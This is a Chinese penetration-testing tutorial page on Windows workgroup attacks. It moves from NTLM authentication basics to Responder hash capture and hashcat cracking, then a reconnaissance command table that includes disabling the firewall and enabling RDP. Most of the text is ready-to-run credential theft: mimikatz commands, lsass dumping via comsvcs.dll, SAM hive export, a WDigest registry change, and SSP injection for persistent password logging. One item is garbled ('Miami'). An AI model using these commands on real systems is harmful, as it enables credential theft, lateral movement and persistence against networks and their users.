当前位置: 首页 > news >正文

2.1_工作组介绍

  • 工作组


  1. 定义:是指在局域网内多台计算机互连而成的计算机组;
  2. 修改工作组:cmd 执行 —> control —> 系统 —> 重命名这台电脑 —> 更改 —> 进行更改 ;
  3. 加入工作组:输入想加入的工作组即可
  4. 退出工作组:换个新的工作组名即可退出工作组

  • 本地认证


  1. 定义:不管离线与否,密码正确即可登录;
  2. 应用:工作组采用的就是本地认证;
  3. 底层:winlogin.exe(管理用户) —> lsass.exe (本地安全和策略登录) —>  SAM 文件 (存放本地用户凭证);
  4. SAM 文件位置:C:\windows\system32\config
  5. 抓取 明文密码 读取内存,抓取NTLM HASH 密码 读取SAM文件;
  6. LM-HASH 和 NTML-HASH 分别是什么?
    1). LM-HASH  :针对早期Windows用户密码进行加密的哈希值,其本质是DES加密的HASH值;(Win server 2008后禁用)
    2). NTML-HASH  :针对当前Windows用户密码进行加密的哈希值,其本质是MD4加密的HASH值;
    3). (若 LM-HASH 为:aad3b435b51404eead3b435b51404ee ,则表示为空或被禁用)
  7. LM-HASH 加密方式(了解):
    1). 将要加密的内容转为大写;
    2). 转为16进制;
    3). 密码不足14个字节右补0;
    4). 将上述14位16进制分为2组;
    5). 将16进制转为2进制;
    6). 7 bit 一组,分组后末尾+0(凑齐8个);
    7). 再将其转为16进制;
    8). 使用 "KGS!@#$%" 的16进制作为明文,对其加密后拼接;
  8. NTML-HASH 加密方式(了解):
    1). 转为16进制,于每个16进制后添加00
    2). 将其MD4加密转为16进制即可;

  • 网络认证


  1. NTLM挑战响应协议认证机制
  2. NTLM认证抓包分析
    1). 一般会有8个个包
    2). 前4个包用于协商;
    3). 第5个包用于启动身份认证和一些规则
    4). 第6个包是challenge; ( 其中NTML-v1 是8位,NTML -v2 是16位)
    5). 第7个包是Response 的数据包
    6). 第8个包是结果信息;
  3. 获取Responder步骤(前提:处于同一网段下):
    1). kali 接收执行:sudo responder -I eth0 -Pv
    2). 其他主机 发送执行:net use \\sfs\sf    任意账户密码
    3). kali 创建文件保存 监听到的内容并使用 hashcat工具 进行破解: hashcat --example-hashes | less | grep NTLM #MODE: 5600
    4). kali 运行:hashcat -m 5600 hash文件 密码字典
    5). 得到密码
  4. NTLM-v1 与 HTLM -v2 的区别:
    1). NTLM-v1:8位
    2). HTLM -v2:16位
  5. NTLM协议认证:他是一种认证方式,用来建立两台电脑的信任,分为NTLM-v1协议和NTLM-v2协议
  6. NTLM-v2-Hash :是在NTLM-v2认证过程中的一段加密的 哈希值
  7. NTLM-v1-Hash :是在NTLM-v1认证过程中的一段加密的 哈希值

  • 工作组信息收集


  1. 内网信息收集
内网信息收集

本机信息收集

(本章节)

进程判断是否存在杀软
端口
  1. 确认服务,寻找特定的服务进行利用;
  2. 如:mysql,mssql等
防火墙是否可以进行外联
用户查看高权限用户
密码测试抓取,破解密码
补丁信息寻找可提权的漏洞
开机自启尝试进行dll劫持,做权限劫持

内网信息收集

(下一章节)

内网IP发现内网主机
端口发现内网服务
服务
  1. 确认服务,寻找特定的服务进行利用;
  2. 如:mysql,mssql等

  1. 使用 命令 进行本地工作组信息收集(CS插件有同样功能)

命令作用目的
  1. HTTP/HTTPScurl / wget / mshta / certutil.exe URL
  2. ICMPping IP
  3. DNSnslookup 域名
  4. TCPtelnet IP 端口
确认对方是否出网根据出网方式,确定攻击命令
ipconfig获取本机的网络配置信息对网段进行扫描
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 

systeminfo| findstr /B /C:"OS 名称" /C:"OS 版本"
查询操作系统和版本信息查找历史版本漏洞
echo %PROCESSOR_ARCHITECTURE%查看系统体系结构确定上传漏洞工具的版本
wmic service list brief本机运行的服务

确认服务,寻找特定的服务进行利用,后门;

如:mysql,mssql等

tasklist

wmic process list brief (当 tasklist 不能使用时,你要执行哪条命令)
查看进程判断是否存在杀软
wmic startup get command,caption主机运行程序查看当前主机运行的程序
schtasks /query /fo LIST /v查看计划任务(如果出现无法加载列资源 输入:chcp 437)可以编辑或修改计划任务
net statistics workstation电脑开机时间确认运行周期和生存时间
net user

wmic useraccount get name ,SID
用户列表信息查看高权限用户
netstat -ano查询端口信息
  1. 确认服务,寻找特定的服务进行利用;
  2. 如:mysql,mssql等
systeminfo

wmic qfe get Caption,Description,HotFixID,InstalledOn
查看补丁信息寻找可提权的漏洞
net share

wmic share get name,path,status
查看默认共享用于内网横移
route print查询路由信息查看当前主机可以访问哪些网段
netsh firewall show state查询防火墙是否开启操作模式为禁用则表示关闭
Windows server 2003: netsh firewall set opmode disable

Windows server 2003之后: netsh firewall set opmode disable 或者netsh advfirewall set allprofiles state off
关闭防火墙
2003及之前的版本:netsh firewall add allowedprogram 指定程序.exe "allownc" enable

netsh advfirewall firewall
  1. 允许应用通过防火墙
  2. 防火墙其他的命令
netsh advfirewall firewall add rule name="pass nc"dir=in action=allow program="C:\指定程序名.exe"2003之后的版本,允许指定的程序进行全部的连接:不建议连接和开启RDP
netsh advfirewall firewall add rule name="Allownc" dir=out action=allow program="C: \指定程序名.exe"允许指定程序退出
netsh advfirewall firewall add rule name="RemoteDesktop" protocol=TCP dir=in localport=3389 action=allow允许3389端口放行
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f开启3389,允许远程连接
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f关闭3389
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f设置远程桌面端口
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1开启远程桌面
  1. netsh wlan show profile    
  2. netsh wlan show profile name="WiFi网络名称” key=clear
  1. 查询连接过的WIFI
  2. 收集本机的WIFI密码信息
  1. 内网渗透
  2. 横向移动,
  3. 持久化攻击

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /V PortNumbe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

查询RDP端口( 0xd3d 即为3389)
cmdkey /l查询当前保存的凭据破解RDP远程登录凭据
arp -a内网扫描主机发现
dir %APPDATA%\Microsoft\Windows\Recent查询最近打开的文件查看是否有敏感的文件
net localgroup查询本地工作组
net localgroup administrators查询管理员组员信息寻找高权限用户
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*查询RDP凭据破解RDP远程登录凭据
wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname /format:list查询杀软等信息查看杀软,看是否有对应的绕过方式

  • 密码抓取


  1. 横向移动的思路:抓密码 --> 横向移动 --> 抓密码 --> 横向移动 .....

  2. 密码关注点(6):
    1). 本地账号密码(或者hash)
    2). 域账号密码(或者hash)
    3). RDP账号密码
    4). 浏览器账号密码
    5). 数据库账号Miami
    6). 本地保存账号密码文件

  3. 为什么能下载明文密码:
    1). 因为会在内存中(lsass.exe)保存明文的密码,
    2). SAM文件中读取Hash密码;  (C:\windows\system32\config)

  4. 抓取密码(前提:具有管理员权限(至少为过了UAC的用户))

    在线读取
    明文
    mimikatzmimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
    CS 插件凭证提取(A)- 抓取明文密码(M)
    HASH
    mimikatzmimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit
    CS 插件凭证提取(A)- 抓取Hash(D)
    工具
    GetPassword64位,运行该程序即可抓取明文密码
    PwDump7获得所有账户的NTLMHash
    QuarksPwDump获得所有账户的NTLMHash
    离线读取
    明文
    • 提升特权模式:privilege::debug
    • 查看lsass.exe进程PID: tasklist | findstr lsass.exe
    • 使用powershell 导出 lsass :
    • powershell rundll32 C:\windows\system32\comsvcs.dll, MiniDump 588 C:\Users\lenovo\Desktop\lsass2.dmp full
      1. C:\windows\system32\comsvcs.dll  为目标文件
      2. MiniDump 后跟 comsvcs.dll 的进程号
      3. C:\Users\lenovo\Desktop\lsass2.dmp  为保存到的路径
    • win10 使用 导出 lsass :powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump "lsass.exe的PID" C:\lsass.dmp full"
    • 读取:
    • mimikatz.exe "sekurlsa::minidump lsass2.dmp" "sekurlsa::logonpasswords full" exit
    HASH
    • reg save hklm\sam sam.hive   导出到 sam.hive 中
    • reg save hklm\system system.hive   导出到 system.hive 中
    • 离线读取hash:mimikatz lsadump::sam /sam:sam.hive /system:system.hive

  • 高版本系统密码抓取


  1. 修改WDigest注册表获取系统密码

    # 攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。
    # 开启 注册表
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f # 查询一下是否存在该值
    reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /V UseLogonCredential# 查询当前登录的用户
    query user# 注销
    logoff ID# 上线后,使用CS插件抓取明文密码
  2. 内存注入SSP获取系统密码

    # 电脑重启会失效
    mimikatz "privilege::debug" "misc::memssp" exit# 赋予调试权限
    privilege::debug# 使用mimikatz读取内存中的密码
    misc::memssp# 锁屏
    rundll32.exe user32.dll,LockWorkStation#用户重新登录后密码会被记录在C:\Windows\System32\mimilsa.log
  3. 注册表添加SSP获取系统密码

    # 1+2 实现权限维持
    # 修改注册表
    reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Security Packages" /t REG_MULTI_SZ /d mimilib.dll /f # 将 mimikatz 下的 mimilib.dll 置于 C:\Windows\System32 下
    # 重启后就会加载SSP# 关机
    shutdown /s /t 0# 查看账号密码
    C:\Windows\System32\kiwissp.log

  • 免责声明


  1. 本专栏内容仅供参考,不构成任何投资、学习或专业建议。读者在参考本专栏内容时,应结合自身实际情况,谨慎作出决策。

  2. 本专栏作者及发布平台尽力确保内容的准确性和可靠性,但无法保证内容的绝对正确。对于因使用本专栏内容而导致的任何损失,作者及发布平台概不负责。

  3. 本专栏部分内容来源于网络,版权归原作者所有。如有侵权,请及时联系我们,我们将尽快予以处理。

  4. 读者在阅读本专栏内容时,应遵守相关法律法规,不得将内容用于非法用途。如因读者行为导致不良后果,作者及发布平台不承担任何责任。

  5. 本免责声明适用于本专栏所有内容,包括文字、图片、音频、视频等。读者在阅读本专栏内容时,视为已接受本免责声明。

  6. 作者及发布平台保留对本免责声明的解释权和修改权,如有变更,将第一时间在本专栏页面进行公告。读者继续使用本专栏内容,视为已同意变更后的免责声明。

敬请广大读者谅解。如有疑问,请联系我们。谢谢!


http://www.mrgr.cn/news/70834.html

相关文章:

  • linux GPIO
  • 如何将Nop平台与Solon框架集成
  • ES6笔记
  • TofuAI处理BT1120时序视频要求
  • echarts-gl 3D柱状图配置
  • 【C++】 C++游戏设计---五子棋小游戏
  • docker安装portainer
  • 基于NI Vision和MATLAB的图像颜色识别与透视变换
  • 故事112
  • 华为OD机试真题-最短木板长度-2024年OD统一考试(E卷)
  • FebHost:土耳其.TR域名迎来爆发式增长
  • 【Linux】如何通过终端命令查看当前可用网络 WIFI + 设置已配置网络的连接优先级 + 连接/断连网络
  • 蓝桥杯真题——班级活动
  • PMP--三模–错题1
  • leetcode_2487
  • 通过vmware虚拟机安装和调试编译好的 ReactOS
  • 前端 call、bind、apply的实际使用
  • GitHub Org
  • 私域流量平台建设方案与运营方案
  • 【JS】不定参数函数
  • 高效视觉方案:AR1335与i.MX8MP的完美结合
  • 抛弃UNet,首个基于DiT的图像编辑框架!DiT4Edit:多尺寸编辑质量更优 | 北大港科大
  • SQL语句执行的基本架构——数据库
  • java + maven + sqlit3 最简单的数据库操作,建表,插入,查询
  • 【快捷入门笔记】mysql基本操作大全-SQL表
  • Ansible常用模块介绍